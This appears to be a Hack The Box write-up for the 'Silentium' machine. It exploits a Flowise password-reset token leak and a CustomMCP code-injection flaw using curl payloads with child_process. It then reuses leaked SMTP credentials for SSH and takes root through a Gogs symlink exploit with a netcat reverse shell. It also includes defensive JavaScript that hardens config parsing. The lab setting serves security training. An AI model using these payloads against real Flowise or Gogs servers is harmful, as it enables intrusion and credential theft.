CyberSaif
Hack the Box / Easy

HTB: Silentium

Tracing an unchecked input from a friendly crash to controlled instruction flow.

Scope

IP Address        Hostname
10.129.245.103    silentium.htb
10.129.245.103    staging.silentium.htb
10.129.245.103    staging-v2-code.dev.silentium.htb

Nmap

We’ll start with an nmap scan to identify the services running on the server.

As the output shows, only ports 22 and 80 are open.

┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 10.129.245.103
Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-19 21:22 -0700
Nmap scan report for silentium.htb (10.129.245.103)
Host is up (0.092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 595.51 seconds

Landing Page

Browsing to http://10.129.245.103:80 shows the website the server is hosting.

Scrolling down, the page lists several people who work there, so they may have some form of access to the server.

There is not much else on the website, so the next step is to enumerate virtual hosts on the server. For that, add silentium.htb with 10.128.245.103 to your /etc/hosts file.

Gobuster

Gobuster scan shows that there is a staging host running.

┌──(root㉿kali)-[/home/kali]
└─# gobuster vhost -u http://silentium.htb -w /usr/share/seclists/Discovery/DNS/combined_subdomains.txt --append-domain -t 250 --timeout 20s
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       http://silentium.htb
[+] Method:                    GET
[+] Threads:                   250
[+] Wordlist:                  /usr/share/seclists/Discovery/DNS/combined_subdomains.txt
[+] User Agent:                gobuster/3.8.2
[+] Timeout:                   20s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
#pop3.silentium.htb Status: 400 [Size: 166]
#www.silentium.htb Status: 400 [Size: 166]
#mail.silentium.htb Status: 400 [Size: 166]
#smtp.silentium.htb Status: 400 [Size: 166]
**staging.silentium.htb Status: 200 [Size: 3142]**
Progress: 653920 / 653920 (100.00%)
===============================================================
Finished
===============================================================

Add this new subdomain to the /etc/hosts file.

#/etc/hosts
127.0.0.1   localhost
::1         localhost
<ip>        silentium.htb staging.silentium.htb

Flowise AI

Accessing staging.silentium.htb reveals a Flowise AI instance, which requires authentication.

Initial Access

CVE-2025-58434

This version is affected by a vulnerability that leaks users’ sensitive information, including the user ID, email, hashed password and a temporary token, whenever a forgot-password request is made. The exposed token can then be used on the reset-password page to reset that user’s password.

Earlier on the landing page, these users were listed: Ben, Marcus, and Elena.

Therefore, we can try these names to see if they have access.

The username ben@silentium.htb works:

curl -i -X POST http://staging.silentium.htb/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"ben@silentium.htb"}}'
#Response
{"user":{"id":"e26c9d6c-678c-4c10-9e36-01813e8fea73","name":"admin","email":"ben@silentium.htb","credential":"$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG","tempToken":"61cpbEwCQZoTPoq8riQLGZZssFK0006ov9E9FRZVqjtaFGQsXVkSLXt0gq6SQGIy","tokenExpiry":"2026-05-15T00:36:22.459Z","status":"active","createdDate":"2026-01-29T20:14:57.000Z","updatedDate":"2026-05-15T00:21:22.000Z","createdBy":"e26c9d6c-678c-4c10-9e36-01813e8fea73","updatedBy":"e26c9d6c-678c-4c10-9e36-01813e8fea73"},"organization":{},"organizationUser":{},"workspace":{},"workspaceUser":{},"role":{}}

The tempToken can be used on the http://staging.silentium.htb/reset-password page to reset Ben’s password.

After gaining access to the portal, the Flowise version can be checked: version 3.0.5 is vulnerable to remote code execution.

CVE-2025-59528

The vulnerability is in the CustomMCP node, which executes the user-provided mcpServerConfig input via Function() without validation. This lets an attacker run arbitrary JavaScript with the full privileges of the Node.js process, enabling command execution and file-system access. It is triggered through the API endpoint /api/v1/node-load-method/customMCP.
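To show why evaluating a config string with Function() is the defect, here is an added example, not Flowise code, that places that sink next to a parser treating the same input strictly as data. The config schema (an `mcpServers` map of `command`/`args`/`env` entries) and the command allowlist are assumptions for illustration, not Flowise’s actual CustomMCP schema, and the probe string is a constructed expression that only sets a marker.

```javascript
// Added example, not Flowise code: the sink behind CVE-2025-59528 next to a
// parser that treats the same input strictly as data. The schema and the
// allowlist below are assumptions for illustration.

// Vulnerable: Function() compiles the caller's string into code that runs in
// the server process. A "config" can therefore be any expression, including
// one that reaches `process` and `require`.
function loadConfigVulnerable(src) {
  return Function(`return ${src}`)();
}

// Constructed probe: an expression that leaves a marker if it is evaluated.
// It stands in for a real payload without executing any command.
const EVAL_PROBE = "({x:(function(){ globalThis.__probeRan = true; return 1; })()})";

const ALLOWED_COMMANDS = new Set(["npx", "node"]);          // assumed allowlist
const ALLOWED_SERVER_KEYS = new Set(["command", "args", "env"]);

// Hardened: parse as JSON, then copy only fields that match the expected
// shape into a fresh object. Unknown keys, non-string values and commands
// outside the allowlist are rejected instead of passed through.
function loadConfigSafe(src) {
  let cfg;
  try {
    cfg = JSON.parse(src);
  } catch {
    throw new Error("mcpServerConfig must be JSON");
  }
  if (!cfg || typeof cfg !== "object" || Array.isArray(cfg)) {
    throw new Error("mcpServerConfig must be a JSON object");
  }
  const top = Object.keys(cfg);
  if (top.length !== 1 || top[0] !== "mcpServers") {
    throw new Error("only an mcpServers object is accepted");
  }
  const servers = cfg.mcpServers;
  if (!servers || typeof servers !== "object" || Array.isArray(servers)) {
    throw new Error("mcpServers must be an object");
  }
  const out = {};
  for (const [name, srv] of Object.entries(servers)) {
    if (!/^[A-Za-z0-9_-]{1,32}$/.test(name)) throw new Error(`bad server name: ${name}`);
    if (!srv || typeof srv !== "object" || Array.isArray(srv)) throw new Error(`bad entry: ${name}`);
    for (const k of Object.keys(srv)) {
      if (!ALLOWED_SERVER_KEYS.has(k)) throw new Error(`unexpected key ${k} in ${name}`);
    }
    if (typeof srv.command !== "string" || !ALLOWED_COMMANDS.has(srv.command)) {
      throw new Error(`command not allowed in ${name}`);
    }
    const args = srv.args ?? [];
    if (!Array.isArray(args) || !args.every((a) => typeof a === "string")) {
      throw new Error(`args must be strings in ${name}`);
    }
    const env = srv.env ?? {};
    if (!env || typeof env !== "object" || Array.isArray(env) ||
        !Object.values(env).every((v) => typeof v === "string")) {
      throw new Error(`env must map to strings in ${name}`);
    }
    out[name] = { command: srv.command, args: [...args], env: { ...env } };
  }
  return out;
}
```

The same probe string is executed by `loadConfigVulnerable` (the marker gets set) and rejected by `loadConfigSafe` before anything runs, because a JavaScript expression is not valid JSON. Copying fields into a fresh object rather than returning the parsed value also means keys such as `__proto__` never reach the consumer.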

You can use either cURL or the script from Exploit DB to gain initial access.

cURL

Source: GitHub

curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q" \
  -d '{
    "loadMethod": "listActions",
    "inputs": {
      "mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"echo !!RCE-OK!! >/tmp/RCE.txt\");return 1;})()})"
    }
  }'

Script

Source: ExploitDB

Start the listener before executing the script.

nc -lvnp <port>
Listening on 0.0.0.0 <port>

User Access

After gaining initial access, let’s view the environment variables. The output below contains an SMTP configuration for the user Ben, so we can try those credentials over SSH: ben@silentium.htb:r04D!!_R4ge

/ # env
FLOWISE_PASSWORD=F1l3_d0ck3r
ALLOW_UNAUTHORIZED_CERTS=true
NODE_VERSION=20.19.4
HOSTNAME=c78c3cceb7ba
YARN_VERSION=1.22.22
SMTP_PORT=1025
SHLVL=3
PORT=3000
HOME=/root
OLDPWD=/home
SENDER_EMAIL=ben@silentium.htb
PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium-browser
JWT_ISSUER=ISSUER
JWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
LLM_PROVIDER=nvidia-nim
SMTP_USERNAME=test
SMTP_SECURE=false
JWT_REFRESH_TOKEN_EXPIRY_IN_MINUTES=43200
FLOWISE_USERNAME=ben
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DATABASE_PATH=/root/.flowise
JWT_TOKEN_EXPIRY_IN_MINUTES=360
JWT_AUDIENCE=AUDIENCE
SECRETKEY_PATH=/root/.flowise
PWD=/
SMTP_PASSWORD=r04D!!_R4ge
NVIDIA_NIM_LLM_MODE=managed
SMTP_HOST=mailhog
JWT_REFRESH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
SMTP_USER=test
/ #

These credentials work, and we now have user access on the machine.

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# ssh ben@silentium.htb
ben@silentium.htb's password:
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-107-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
<truncated>

ben@silentium:~$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben),100(users)
ben@silentium:~$ ls
user.txt
ben@silentium:~$ cat user.txt
62d******************b815
ben@silentium:~$

Privilege Escalation

After gaining user access, let’s see what services are running on the system.

ben@silentium:~$ ss -tulnp
Netid                State                 Recv-Q                Send-Q                                Local Address:Port                                  Peer Address:Port                Process
udp                  UNCONN                0                     0                                        127.0.0.54:53                                         0.0.0.0:*
udp                  UNCONN                0                     0                                     127.0.0.53%lo:53                                         0.0.0.0:*
udp                  UNCONN                0                     0                                           0.0.0.0:68                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:8025                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:1025                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                     127.0.0.54:53                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:39459                                      0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:3000                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:3001                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                  127.0.0.53%lo:53                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                        0.0.0.0:22                                         0.0.0.0:*
tcp                  LISTEN                0                     511                                         0.0.0.0:80                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                           [::]:22                                            [::]:*
tcp                  LISTEN                0                     511                                            [::]:80                                            [::]:*
ben@silentium:~$

Gogs

After going through all of the running services, I found that the server is running Gogs on port 3001.

Gogs is a lightweight, open-source, self-hosted Git service that lets you host and manage your own Git repositories, similar to GitHub or GitLab, on your own server (Gogs, 2026).

Let’s forward the port so that port 3001 can be reached from the local machine.

The same service can also be accessed at **staging-v2-code.dev.silentium.htb** (make sure to add the vhost to your /etc/hosts file).

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# ssh -L 3001:127.0.0.1:3001 ben@silentium.htb

On the page, we have an option to create an account. Let’s do that. After creating an account, go to settings and generate a token key. Store it somewhere, you’ll need it later for privilege escalation.


CVE-2025-8110

A quick Google search shows that there is a zero-day vulnerability that is being exploited in the wild. Let’s test that exploit against Gogs.

This is a path-traversal/symlink vulnerability in Gogs that lets an authenticated user escape a repository’s directory and potentially execute code on the server, in our case the Silentium machine.

To read the full article, refer to https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit

For privilege escalation, I’ll use the following script to exploit the vulnerability.

https://github.com/TYehan/CVE-2025-8110-Gogs-RCE-Exploit

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# python3 exploit.py -u http://127.0.0.1:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 6565

Root Flag

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# nc -lvnp 6565
listening on [any] 6565
connect to [10.10.15.93] from (UNKNOWN) [10.129.16.24] 33502
bash: cannot set terminal process group (1494): Inappropriate ioctl for device
bash: no job control in this shell
root@silentium:/opt/gogs/gogs/data/tmp/local-repo/1# ls
malicious_link
README.md
root@silentium:/opt/gogs/gogs/data/tmp/local-repo/1# cd ~
root@silentium:~#ls
gogs-repositories  root.txt
root@silentium:~#cat root.txt
33a**************2a

Resources

CVE-2025-58434 - Forgot Password tempToken

CVE-2025-59528 - CustomMCP Vulnerability

CVE-2025-8110 - Gogs Symlink Vulnerability